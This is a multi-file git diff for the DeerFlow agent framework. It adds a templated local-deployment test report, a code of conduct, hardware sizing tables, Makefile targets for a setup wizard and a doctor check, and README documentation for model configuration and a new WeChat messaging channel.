||||
|
||||
**Test Date**: {{test_date}}
|
||||
**Test Environment**: {{test_environment}}
|
||||
**Deployment Mode**: Local
|
||||
**Test Version**: {{git_commit}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Summary
|
||||
|
||||
| Metric | Status |
|
||||
|------|------|
|
||||
| Total Test Phases | 6 |
|
||||
| Passed Phases | {{passed_stages}} |
|
||||
| Failed Phases | {{failed_stages}} |
|
||||
| Overall Conclusion | **{{overall_status}}** |
|
||||
|
||||
### Key Test Cases
|
||||
|
||||
| Case | Result | Details |
|
||||
|------|--------|---------|
|
||||
| Code update check | {{case_code_update}} | {{case_code_update_details}} |
|
||||
| Environment check | {{case_env_check}} | {{case_env_check_details}} |
|
||||
| Configuration preparation | {{case_config_prep}} | {{case_config_prep_details}} |
|
||||
| Deployment | {{case_deploy}} | {{case_deploy_details}} |
|
||||
| Health check | {{case_health_check}} | {{case_health_check_details}} |
|
||||
| Frontend routes | {{case_frontend_routes_overall}} | {{case_frontend_routes_details}} |
|
||||
|
||||
---
|
||||
|
||||
## Detailed Test Results
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
- [x] Confirm current directory - {{status_dir_check}}
|
||||
- [x] Check Git status - {{status_git_status}}
|
||||
- [x] Pull latest code - {{status_git_pull}}
|
||||
- [x] Confirm code update - {{status_git_verify}}
|
||||
|
||||
**Phase Status**: {{stage1_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Local Environment Check
|
||||
|
||||
- [x] Node.js version - {{status_node_version}}
|
||||
- [x] pnpm - {{status_pnpm}}
|
||||
- [x] uv - {{status_uv}}
|
||||
- [x] nginx - {{status_nginx}}
|
||||
- [x] Port check - {{status_port_check}}
|
||||
|
||||
**Phase Status**: {{stage2_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
- [x] config.yaml - {{status_config_yaml}}
|
||||
- [x] .env file - {{status_env_file}}
|
||||
- [x] Model configuration - {{status_model_config}}
|
||||
|
||||
**Phase Status**: {{stage3_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 4: Local Deployment
|
||||
|
||||
- [x] make check - {{status_make_check}}
|
||||
- [x] make install - {{status_make_install}}
|
||||
- [x] make dev-daemon / make dev - {{status_local_start}}
|
||||
- [x] Service startup wait - {{status_wait_startup}}
|
||||
|
||||
**Phase Status**: {{stage4_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
- [x] Process status - {{status_processes}}
|
||||
- [x] Frontend service - {{status_frontend}}
|
||||
- [x] API Gateway - {{status_api_gateway}}
|
||||
- [x] LangGraph service - {{status_langgraph}}
|
||||
|
||||
**Phase Status**: {{stage5_status}}
|
||||
|
||||
---
|
||||
|
||||
### Frontend Routes Smoke Results
|
||||
|
||||
| Route | Status | Details |
|
||||
|-------|--------|---------|
|
||||
| Landing `/` | {{landing_status}} | {{landing_details}} |
|
||||
| Workspace redirect `/workspace` | {{workspace_redirect_status}} | target {{workspace_redirect_target}} |
|
||||
| New chat `/workspace/chats/new` | {{new_chat_status}} | {{new_chat_details}} |
|
||||
| Chats list `/workspace/chats` | {{chats_list_status}} | {{chats_list_details}} |
|
||||
| Agents gallery `/workspace/agents` | {{agents_gallery_status}} | {{agents_gallery_details}} |
|
||||
| Docs `{{docs_path}}` | {{docs_status}} | {{docs_details}} |
|
||||
|
||||
**Summary**: {{frontend_routes_summary}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 6: Test Report Generation
|
||||
|
||||
- [x] Result summary - {{status_summary}}
|
||||
- [x] Issue log - {{status_issues}}
|
||||
- [x] Report generation - {{status_report}}
|
||||
|
||||
**Phase Status**: {{stage6_status}}
|
||||
|
||||
---
|
||||
|
||||
## Issue Log
|
||||
|
||||
### Issue 1
|
||||
**Description**: {{issue1_description}}
|
||||
**Severity**: {{issue1_severity}}
|
||||
**Solution**: {{issue1_solution}}
|
||||
|
||||
---
|
||||
|
||||
## Environment Information
|
||||
|
||||
### Local Dependency Versions
|
||||
```text
|
||||
Node.js: {{node_version_output}}
|
||||
pnpm: {{pnpm_version_output}}
|
||||
uv: {{uv_version_output}}
|
||||
nginx: {{nginx_version_output}}
|
||||
```
|
||||
|
||||
### Git Information
|
||||
```text
|
||||
Repository: {{git_repo}}
|
||||
Branch: {{git_branch}}
|
||||
Commit: {{git_commit}}
|
||||
Commit Message: {{git_commit_message}}
|
||||
```
|
||||
|
||||
### Configuration Summary
|
||||
- config.yaml exists: {{config_exists}}
|
||||
- .env file exists: {{env_exists}}
|
||||
- Number of configured models: {{model_count}}
|
||||
|
||||
---
|
||||
|
||||
## Local Service Status
|
||||
|
||||
| Service | Status | Endpoint |
|
||||
|---------|--------|----------|
|
||||
| Nginx | {{nginx_status}} | {{nginx_endpoint}} |
|
||||
| Frontend | {{frontend_status}} | {{frontend_endpoint}} |
|
||||
| Gateway | {{gateway_status}} | {{gateway_endpoint}} |
|
||||
| LangGraph | {{langgraph_status}} | {{langgraph_endpoint}} |
|
||||
|
||||
---
|
||||
|
||||
## Recommendations and Next Steps
|
||||
|
||||
### If the Test Passes
|
||||
1. [ ] Visit http://localhost:2026 to start using DeerFlow
|
||||
2. [ ] Configure your preferred model if it is not configured yet
|
||||
3. [ ] Explore available skills
|
||||
4. [ ] Refer to the documentation to learn more features
|
||||
|
||||
### If the Test Fails
|
||||
1. [ ] Review references/troubleshooting.md for common solutions
|
||||
2. [ ] Check local logs: `logs/{langgraph,gateway,frontend,nginx}.log`
|
||||
3. [ ] Verify configuration file format and content
|
||||
4. [ ] If needed, fully reset the environment: `make stop && make clean && make install && make dev-daemon`
|
||||
|
||||
---
|
||||
|
||||
## Appendix
|
||||
|
||||
### Full Logs
|
||||
{{full_logs}}
|
||||
|
||||
### Tester
|
||||
{{tester_name}}
|
||||
|
||||
---
|
||||
|
||||
*Report generated at: {{report_time}}*
|
||||
@@ -33,5 +33,9 @@ INFOQUEST_API_KEY=your-infoquest-api-key
|
||||
|
||||
# GitHub API Token
|
||||
# GITHUB_TOKEN=your-github-token
|
||||
|
||||
# Database (only needed when config.yaml has database.backend: postgres)
|
||||
# DATABASE_URL=postgresql://deerflow:password@localhost:5432/deerflow
|
||||
#
|
||||
# WECOM_BOT_ID=your-wecom-bot-id
|
||||
# WECOM_BOT_SECRET=your-wecom-bot-secret
|
||||
|
||||
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
willem.jiang@gmail.com.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
@@ -77,6 +77,18 @@ export UV_INDEX_URL=https://pypi.org/simple
|
||||
export NPM_REGISTRY=https://registry.npmjs.org
|
||||
```
|
||||
|
||||
#### Recommended host resources
|
||||
|
||||
Use these as practical starting points for development and review environments:
|
||||
|
||||
| Scenario | Starting point | Recommended | Notes |
|
||||
|---------|-----------|------------|-------|
|
||||
| `make dev` on one machine | 4 vCPU, 8 GB RAM | 8 vCPU, 16 GB RAM | Best when DeerFlow uses hosted model APIs. |
|
||||
| `make docker-start` review environment | 4 vCPU, 8 GB RAM | 8 vCPU, 16 GB RAM | Docker image builds and sandbox containers need extra headroom. |
|
||||
| Shared Linux test server | 8 vCPU, 16 GB RAM | 16 vCPU, 32 GB RAM | Prefer this for heavier multi-agent runs or multiple reviewers. |
|
||||
|
||||
`2 vCPU / 4 GB` environments often fail to start reliably or become unresponsive under normal DeerFlow workloads.
|
||||
|
||||
#### Linux: Docker daemon permission denied
|
||||
|
||||
If `make docker-init`, `make docker-start`, or `make docker-stop` fails on Linux with an error like below, your current user likely does not have permission to access the Docker daemon socket:
|
||||
|
||||
@@ -1,19 +1,25 @@
|
||||
# DeerFlow - Unified Development Environment
|
||||
|
||||
.PHONY: help config config-upgrade check install dev dev-pro dev-daemon dev-daemon-pro start start-pro start-daemon start-daemon-pro stop up up-pro down clean docker-init docker-start docker-start-pro docker-stop docker-logs docker-logs-frontend docker-logs-gateway
|
||||
.PHONY: help config config-upgrade check install setup doctor dev dev-pro dev-daemon dev-daemon-pro start start-pro start-daemon start-daemon-pro stop up up-pro down clean docker-init docker-start docker-start-pro docker-stop docker-logs docker-logs-frontend docker-logs-gateway
|
||||
|
||||
BASH ?= bash
|
||||
BACKEND_UV_RUN = cd backend && uv run
|
||||
|
||||
# Detect OS for Windows compatibility
|
||||
ifeq ($(OS),Windows_NT)
|
||||
SHELL := cmd.exe
|
||||
PYTHON ?= python
|
||||
# Run repo shell scripts through Git Bash when Make is launched from cmd.exe / PowerShell.
|
||||
RUN_WITH_GIT_BASH = call scripts\run-with-git-bash.cmd
|
||||
else
|
||||
PYTHON ?= python3
|
||||
RUN_WITH_GIT_BASH =
|
||||
endif
|
||||
|
||||
help:
|
||||
@echo "DeerFlow Development Commands:"
|
||||
@echo " make setup - Interactive setup wizard (recommended for new users)"
|
||||
@echo " make doctor - Check configuration and system requirements"
|
||||
@echo " make config - Generate local config files (aborts if config already exists)"
|
||||
@echo " make config-upgrade - Merge new fields from config.example.yaml into config.yaml"
|
||||
@echo " make check - Check if all required tools are installed"
|
||||
@@ -44,11 +50,18 @@ help:
|
||||
@echo " make docker-logs-frontend - View Docker frontend logs"
|
||||
@echo " make docker-logs-gateway - View Docker gateway logs"
|
||||
|
||||
## Setup & Diagnosis
|
||||
setup:
|
||||
@$(BACKEND_UV_RUN) python ../scripts/setup_wizard.py
|
||||
|
||||
doctor:
|
||||
@$(BACKEND_UV_RUN) python ../scripts/doctor.py
|
||||
|
||||
config:
|
||||
@$(PYTHON) ./scripts/configure.py
|
||||
|
||||
config-upgrade:
|
||||
@./scripts/config-upgrade.sh
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/config-upgrade.sh
|
||||
|
||||
# Check required tools
|
||||
check:
|
||||
@@ -106,78 +119,46 @@ setup-sandbox:
|
||||
# Start all services in development mode (with hot-reloading)
|
||||
dev:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev
|
||||
else
|
||||
@./scripts/serve.sh --dev
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev
|
||||
|
||||
# Start all services in dev + Gateway mode (experimental: agent runtime embedded in Gateway)
|
||||
dev-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --gateway
|
||||
else
|
||||
@./scripts/serve.sh --dev --gateway
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --gateway
|
||||
|
||||
# Start all services in production mode (with optimizations)
|
||||
start:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod
|
||||
else
|
||||
@./scripts/serve.sh --prod
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod
|
||||
|
||||
# Start all services in prod + Gateway mode (experimental)
|
||||
start-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --gateway
|
||||
else
|
||||
@./scripts/serve.sh --prod --gateway
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --gateway
|
||||
|
||||
# Start all services in daemon mode (background)
|
||||
dev-daemon:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --daemon
|
||||
else
|
||||
@./scripts/serve.sh --dev --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --daemon
|
||||
|
||||
# Start daemon + Gateway mode (experimental)
|
||||
dev-daemon-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --gateway --daemon
|
||||
else
|
||||
@./scripts/serve.sh --dev --gateway --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --gateway --daemon
|
||||
|
||||
# Start prod services in daemon mode (background)
|
||||
start-daemon:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --daemon
|
||||
else
|
||||
@./scripts/serve.sh --prod --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --daemon
|
||||
|
||||
# Start prod daemon + Gateway mode (experimental)
|
||||
start-daemon-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --gateway --daemon
|
||||
else
|
||||
@./scripts/serve.sh --prod --gateway --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --gateway --daemon
|
||||
|
||||
# Stop all services
|
||||
stop:
|
||||
@./scripts/serve.sh --stop
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --stop
|
||||
|
||||
# Clean up
|
||||
clean: stop
|
||||
@@ -193,29 +174,29 @@ clean: stop
|
||||
|
||||
# Initialize Docker containers and install dependencies
|
||||
docker-init:
|
||||
@./scripts/docker.sh init
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh init
|
||||
|
||||
# Start Docker development environment
|
||||
docker-start:
|
||||
@./scripts/docker.sh start
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh start
|
||||
|
||||
# Start Docker in Gateway mode (experimental)
|
||||
docker-start-pro:
|
||||
@./scripts/docker.sh start --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh start --gateway
|
||||
|
||||
# Stop Docker development environment
|
||||
docker-stop:
|
||||
@./scripts/docker.sh stop
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh stop
|
||||
|
||||
# View Docker development logs
|
||||
docker-logs:
|
||||
@./scripts/docker.sh logs
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs
|
||||
|
||||
# View Docker development logs
|
||||
docker-logs-frontend:
|
||||
@./scripts/docker.sh logs --frontend
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs --frontend
|
||||
docker-logs-gateway:
|
||||
@./scripts/docker.sh logs --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs --gateway
|
||||
|
||||
# ==========================================
|
||||
# Production Docker Commands
|
||||
@@ -223,12 +204,12 @@ docker-logs-gateway:
|
||||
|
||||
# Build and start production services
|
||||
up:
|
||||
@./scripts/deploy.sh
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh
|
||||
|
||||
# Build and start production services in Gateway mode
|
||||
up-pro:
|
||||
@./scripts/deploy.sh --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh --gateway
|
||||
|
||||
# Stop and remove production containers
|
||||
down:
|
||||
@./scripts/deploy.sh down
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh down
|
||||
|
||||
@@ -53,6 +53,7 @@ DeerFlow has newly integrated the intelligent search and crawling toolset indepe
|
||||
- [Quick Start](#quick-start)
|
||||
- [Configuration](#configuration)
|
||||
- [Running the Application](#running-the-application)
|
||||
- [Deployment Sizing](#deployment-sizing)
|
||||
- [Option 1: Docker (Recommended)](#option-1-docker-recommended)
|
||||
- [Option 2: Local Development](#option-2-local-development)
|
||||
- [Advanced](#advanced)
|
||||
@@ -103,35 +104,38 @@ That prompt is intended for coding agents. It tells the agent to clone the repo
|
||||
cd deer-flow
|
||||
```
|
||||
|
||||
2. **Generate local configuration files**
|
||||
2. **Run the setup wizard**
|
||||
|
||||
From the project root directory (`deer-flow/`), run:
|
||||
|
||||
```bash
|
||||
make config
|
||||
make setup
|
||||
```
|
||||
|
||||
This command creates local configuration files based on the provided example templates.
|
||||
This launches an interactive wizard that guides you through choosing an LLM provider, optional web search, and execution/safety preferences such as sandbox mode, bash access, and file-write tools. It generates a minimal `config.yaml` and writes your keys to `.env`. Takes about 2 minutes.
|
||||
|
||||
3. **Configure your preferred model(s)**
|
||||
The wizard also lets you configure an optional web search provider, or skip it for now.
|
||||
|
||||
Edit `config.yaml` and define at least one model:
|
||||
Run `make doctor` at any time to verify your setup and get actionable fix hints.
|
||||
|
||||
> **Advanced / manual configuration**: If you prefer to edit `config.yaml` directly, run `make config` instead to copy the full template. See `config.example.yaml` for the complete reference including CLI-backed providers (Codex CLI, Claude Code OAuth), OpenRouter, Responses API, and more.
|
||||
|
||||
<details>
|
||||
<summary>Manual model configuration examples</summary>
|
||||
|
||||
```yaml
|
||||
models:
|
||||
- name: gpt-4 # Internal identifier
|
||||
display_name: GPT-4 # Human-readable name
|
||||
use: langchain_openai:ChatOpenAI # LangChain class path
|
||||
model: gpt-4 # Model identifier for API
|
||||
api_key: $OPENAI_API_KEY # API key (recommended: use env var)
|
||||
max_tokens: 4096 # Maximum tokens per request
|
||||
temperature: 0.7 # Sampling temperature
|
||||
- name: gpt-4o
|
||||
display_name: GPT-4o
|
||||
use: langchain_openai:ChatOpenAI
|
||||
model: gpt-4o
|
||||
api_key: $OPENAI_API_KEY
|
||||
|
||||
- name: openrouter-gemini-2.5-flash
|
||||
display_name: Gemini 2.5 Flash (OpenRouter)
|
||||
use: langchain_openai:ChatOpenAI
|
||||
model: google/gemini-2.5-flash-preview
|
||||
api_key: $OPENAI_API_KEY # OpenRouter still uses the OpenAI-compatible field name here
|
||||
api_key: $OPENROUTER_API_KEY
|
||||
base_url: https://openrouter.ai/api/v1
|
||||
|
||||
- name: gpt-5-responses
|
||||
@@ -181,50 +185,39 @@ That prompt is intended for coding agents. It tells the agent to clone the repo
|
||||
```
|
||||
|
||||
- Codex CLI reads `~/.codex/auth.json`
|
||||
- The Codex Responses endpoint currently rejects `max_tokens` and `max_output_tokens`, so `CodexChatModel` does not expose a request-level token cap
|
||||
- Claude Code accepts `CLAUDE_CODE_OAUTH_TOKEN`, `ANTHROPIC_AUTH_TOKEN`, `CLAUDE_CODE_OAUTH_TOKEN_FILE_DESCRIPTOR`, `CLAUDE_CODE_CREDENTIALS_PATH`, or plaintext `~/.claude/.credentials.json`
|
||||
- ACP agent entries are separate from model providers. If you configure `acp_agents.codex`, point it at a Codex ACP adapter such as `npx -y @zed-industries/codex-acp`; the standard `codex` CLI binary is not ACP-compatible by itself
|
||||
- On macOS, DeerFlow does not probe Keychain automatically. Export Claude Code auth explicitly if needed:
|
||||
- Claude Code accepts `CLAUDE_CODE_OAUTH_TOKEN`, `ANTHROPIC_AUTH_TOKEN`, `CLAUDE_CODE_CREDENTIALS_PATH`, or `~/.claude/.credentials.json`
|
||||
- ACP agent entries are separate from model providers — if you configure `acp_agents.codex`, point it at a Codex ACP adapter such as `npx -y @zed-industries/codex-acp`
|
||||
- On macOS, export Claude Code auth explicitly if needed:
|
||||
|
||||
```bash
|
||||
eval "$(python3 scripts/export_claude_code_oauth.py --print-export)"
|
||||
```
|
||||
|
||||
4. **Set API keys for your configured model(s)**
|
||||
|
||||
Choose one of the following methods:
|
||||
|
||||
- Option A: Edit the `.env` file in the project root (Recommended)
|
||||
|
||||
API keys can also be set manually in `.env` (recommended) or exported in your shell:
|
||||
|
||||
```bash
|
||||
TAVILY_API_KEY=your-tavily-api-key
|
||||
OPENAI_API_KEY=your-openai-api-key
|
||||
# OpenRouter also uses OPENAI_API_KEY when your config uses langchain_openai:ChatOpenAI + base_url.
|
||||
# Add other provider keys as needed
|
||||
INFOQUEST_API_KEY=your-infoquest-api-key
|
||||
TAVILY_API_KEY=your-tavily-api-key
|
||||
```
|
||||
|
||||
- Option B: Export environment variables in your shell
|
||||
|
||||
```bash
|
||||
export OPENAI_API_KEY=your-openai-api-key
|
||||
```
|
||||
|
||||
For CLI-backed providers:
|
||||
- Codex CLI: `~/.codex/auth.json`
|
||||
- Claude Code OAuth: explicit env/file handoff or `~/.claude/.credentials.json`
|
||||
|
||||
- Option C: Edit `config.yaml` directly (Not recommended for production)
|
||||
|
||||
```yaml
|
||||
models:
|
||||
- name: gpt-4
|
||||
api_key: your-actual-api-key-here # Replace placeholder
|
||||
```
|
||||
</details>
|
||||
|
||||
### Running the Application
|
||||
|
||||
#### Deployment Sizing
|
||||
|
||||
Use the table below as a practical starting point when choosing how to run DeerFlow:
|
||||
|
||||
| Deployment target | Starting point | Recommended | Notes |
|
||||
|---------|-----------|------------|-------|
|
||||
| Local evaluation / `make dev` | 4 vCPU, 8 GB RAM, 20 GB free SSD | 8 vCPU, 16 GB RAM | Good for one developer or one light session with hosted model APIs. `2 vCPU / 4 GB` is usually not enough. |
|
||||
| Docker development / `make docker-start` | 4 vCPU, 8 GB RAM, 25 GB free SSD | 8 vCPU, 16 GB RAM | Image builds, bind mounts, and sandbox containers need more headroom than pure local dev. |
|
||||
| Long-running server / `make up` | 8 vCPU, 16 GB RAM, 40 GB free SSD | 16 vCPU, 32 GB RAM | Preferred for shared use, multi-agent runs, report generation, or heavier sandbox workloads. |
|
||||
|
||||
- These numbers cover DeerFlow itself. If you also host a local LLM, size that service separately.
|
||||
- Linux plus Docker is the recommended deployment target for a persistent server. macOS and Windows are best treated as development or evaluation environments.
|
||||
- If CPU or memory usage stays pinned, reduce concurrent runs first, then move to the next sizing tier.
|
||||
|
||||
#### Option 1: Docker (Recommended)
|
||||
|
||||
**Development** (hot-reload, source mounts):
|
||||
@@ -261,7 +254,7 @@ See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed Docker development guide.
|
||||
|
||||
If you prefer running services locally:
|
||||
|
||||
Prerequisite: complete the "Configuration" steps above first (`make config` and model API keys). `make dev` requires a valid configuration file (defaults to `config.yaml` in the project root; can be overridden via `DEER_FLOW_CONFIG_PATH`).
|
||||
Prerequisite: complete the "Configuration" steps above first (`make setup`). `make dev` requires a valid `config.yaml` in the project root (can be overridden via `DEER_FLOW_CONFIG_PATH`). Run `make doctor` to verify your setup before starting.
|
||||
On Windows, run the local development flow from Git Bash. Native `cmd.exe` and PowerShell shells are not supported for the bash-based service scripts, and WSL is not guaranteed because some scripts rely on Git for Windows utilities such as `cygpath`.
|
||||
|
||||
1. **Check prerequisites**:
|
||||
@@ -375,6 +368,7 @@ DeerFlow supports receiving tasks from messaging apps. Channels auto-start when
|
||||
| Telegram | Bot API (long-polling) | Easy |
|
||||
| Slack | Socket Mode | Moderate |
|
||||
| Feishu / Lark | WebSocket | Moderate |
|
||||
| WeChat | Tencent iLink (long-polling) | Moderate |
|
||||
| WeCom | WebSocket | Moderate |
|
||||
|
||||
**Configuration in `config.yaml`:**
|
||||
@@ -419,6 +413,19 @@ channels:
|
||||
bot_token: $TELEGRAM_BOT_TOKEN
|
||||
allowed_users: [] # empty = allow all
|
||||
|
||||
wechat:
|
||||
enabled: false
|
||||
bot_token: $WECHAT_BOT_TOKEN
|
||||
ilink_bot_id: $WECHAT_ILINK_BOT_ID
|
||||
qrcode_login_enabled: true # optional: allow first-time QR bootstrap when bot_token is absent
|
||||
allowed_users: [] # empty = allow all
|
||||
polling_timeout: 35
|
||||
state_dir: ./.deer-flow/wechat/state
|
||||
max_inbound_image_bytes: 20971520
|
||||
max_outbound_image_bytes: 20971520
|
||||
max_inbound_file_bytes: 52428800
|
||||
max_outbound_file_bytes: 52428800
|
||||
|
||||
# Optional: per-channel / per-user session settings
|
||||
session:
|
||||
assistant_id: mobile-agent # custom agent names are also supported here
|
||||
@@ -452,6 +459,10 @@ SLACK_APP_TOKEN=xapp-...
|
||||
FEISHU_APP_ID=cli_xxxx
|
||||
FEISHU_APP_SECRET=your_app_secret
|
||||
|
||||
# WeChat iLink
|
||||
WECHAT_BOT_TOKEN=your_ilink_bot_token
|
||||
WECHAT_ILINK_BOT_ID=your_ilink_bot_id
|
||||
|
||||
# WeCom
|
||||
WECOM_BOT_ID=your_bot_id
|
||||
WECOM_BOT_SECRET=your_bot_secret
|
||||
@@ -477,6 +488,14 @@ WECOM_BOT_SECRET=your_bot_secret
|
||||
3. Under **Events**, subscribe to `im.message.receive_v1` and select **Long Connection** mode.
|
||||
4. Copy the App ID and App Secret. Set `FEISHU_APP_ID` and `FEISHU_APP_SECRET` in `.env` and enable the channel in `config.yaml`.
|
||||
|
||||
**WeChat Setup**
|
||||
|
||||
1. Enable the `wechat` channel in `config.yaml`.
|
||||
2. Either set `WECHAT_BOT_TOKEN` in `.env`, or set `qrcode_login_enabled: true` for first-time QR bootstrap.
|
||||
3. When `bot_token` is absent and QR bootstrap is enabled, watch backend logs for the QR content returned by iLink and complete the binding flow.
|
||||
4. After the QR flow succeeds, DeerFlow persists the acquired token under `state_dir` for later restarts.
|
||||
5. For Docker Compose deployments, keep `state_dir` on a persistent volume so the `get_updates_buf` cursor and saved auth state survive restarts.
|
||||
|
||||
**WeCom Setup**
|
||||
|
||||
